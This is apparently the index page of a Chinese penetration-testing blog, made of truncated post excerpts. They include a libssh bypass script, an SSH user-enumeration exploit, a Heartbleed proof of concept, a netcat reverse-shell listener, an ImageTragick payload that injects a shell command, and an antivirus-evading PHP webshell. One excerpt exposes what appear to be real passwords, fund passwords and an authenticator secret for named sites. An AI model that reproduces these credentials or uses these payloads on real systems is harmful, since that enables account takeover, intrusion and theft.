参考:  https://github.com/TophantTechnology/ARL

参考；  https://github.com/p1g3/JSINFO-SCAN

在安装了老版本的第三方包 libssh 的机器上可以使用。 ldconfig -p | grep libssh  就可以得知本机是否安装。 运行：$ python3 connect.py baji.sweetysoft.com 2222 'df -kh' #!/usr/bin/env python3 import sys import paramiko import socket...

vulhub中收录。 python3 sshUsernameEnumExploit.py --port 35888 --userList exampleInput.txt bug.sweetysoft.comroot is a valid user!rootInvalid is not a valid user! 运行脚本： https://github.com/Rhynorater/CVE...

该漏洞出现与2014年。可以通过不断的内存越界访问来获得额外的信息。 只要目标服务器开启了ssl ， 就可以（2014年以前基本都中招了） 运行下列python 文件即可。 python3  this_py_file.py <target ip>  #!/usr/bin/python # Quick and dirty demonstration of CV...

来这里特别好用： https://scan.top15.cn/web/  可以看到指纹。 需要在本地路径搭建 fofa.so   输入 根域名，就可以看到相关的对应信息

参考：https://www.nakivo.com/blog/vmware-p2v-linux-conversion-comprehensive-walkthrough/ 以及  https://www.starwindsoftware.com/blog/convert-a-physical-linux-server-to-vmware-vm 使用 P2V： 

refer to:  https://www.virustotal.com/gui/join-us

参考：https://xz.aliyun.com/t/8358 章原载与公众号：猪猪谈安全 作者：随风kali 信息收集 搞渗透的人应该都清楚，信息收集对于渗透测试来说是非常重要的，我们手上掌握的目标的信息越多，成功渗透的概率就越大，而信息收集又分为两类。 第一类：主动信息收集：通过直接访问、扫描网站，这种流量将流经网站 第二类：被动信息收集：利用第三方的服务对目标进行访问了解，比例：Go...

sojson.v4 参考：https://www.bingdou.net/news/295.html 微信小程序的解密参考：  https://blog.csdn.net/wgpython/article/details/103587957 目前来看，js 加密的话，2个途径： 1。 字符串转移， a => \x37  , b => \x67 这样的&#1...

https://block.ve-china.com.cn/GEcoin/ dboss.in: 13522223382 aaa333AAA$$$ 资金密码 sss333sss333 谷歌 密钥：TOAV4JBK7N62B3P3 dboss.in  [email protected] abc123ABC!@# 资金密码 abc123ABC!@#a   （多...

反弹shell , 超级强大， 英文 reverse shell （反向shell )  参考 在线生成器：https://shellgenerator.github.io 这个简直太强大了！ 1. 在本地搭建好一个 reverse shell server:   nc -nvlp 5000 这就表示，你的本地已经有5000端口在监听从外面发过来的 请求了。&...

refer to: https://quake.360.net/quake/#/index 太简单，没啥好说的，直接看图。 360 一年的会员， 每月1W条 也可以根据需要来购买, 80 / 1w条查询  也有更多档位  很人性化了

上传一个文件，内容为： push graphic-contextviewbox 0 0 640 480 image over 0,0 0,0 'https://baji.sweetysoft.com:3000/hi?x=`id > /tmp/lala`'    pop graphic-context 0x00 任意命令执行 一旦服务器端执行 convert...

漏洞字典（世界漏洞数据库）https://nvd.nist.gov/vuln 时刻关注这里，会有持续的所有漏洞更新。 这里也是CVE的，跟上面有啥区别没细看，也能下载所有的CVE   https://cve.mitre.org/ 这里这里这里！！ https://cve.mitre.org/data/downloads/index.html CVE的全部！ php&#1...

看起来相当不错。 做梦的时候梦到，所以起床赶紧弄起来。 没个靶机，学到好多内容都无法练手，跟高中做了题却不知道对错一个感觉。  所以靶机相当必要。  https://github.com/vulhub/vulhub   7k star     https://github.com/Medicean/VulApps&#160...

这个简直太强大了 一直以来我以为无法过是因为 eval 的原因， 看了很多免杀，都是使用assert php 7.1 以后就无法使用assert 了。 所以看起来还是没问题的。 估计以后 使用自行加密、解密的方式是绕过的主流 <?php class PLRN{ public $DLUG = null; public $FVRE = null; function __con...

有的话陆续加上。 360目前的列表：https://security.360.cn/News/affiche 绿盟的列表：http://www.nsfocus.net/vulndb/50297

安装 1. vmware 安装新系统时， 要使用 “安装版”iso, （也就是windows的官方安装光盘的内容），而不是ghost等内容。 2. 使用迅雷下载的时候，用手机的4G可能更快一些。 3. 下载后，需要使用winiso把对应的 镜像文件copy出来. 4. 使用大白菜U盘可以直接安装. 不过记得要把 ghost 文件copy到大白菜所在的U盘中。（可能有的U盘不认4G以上的大文件...

dex2jar: 是一个工具,直接https://sourceforge.net/projects/dex2jar/ 这里下载. 下载后解压缩,能得到一系列的命令   d2j-jar2dex.sh 这个就是咱们需要的.  把它放到PATH下,就可以直接使用.  那么问题来了,如何反编译apk:  1. 下载某个apk .  并且重命...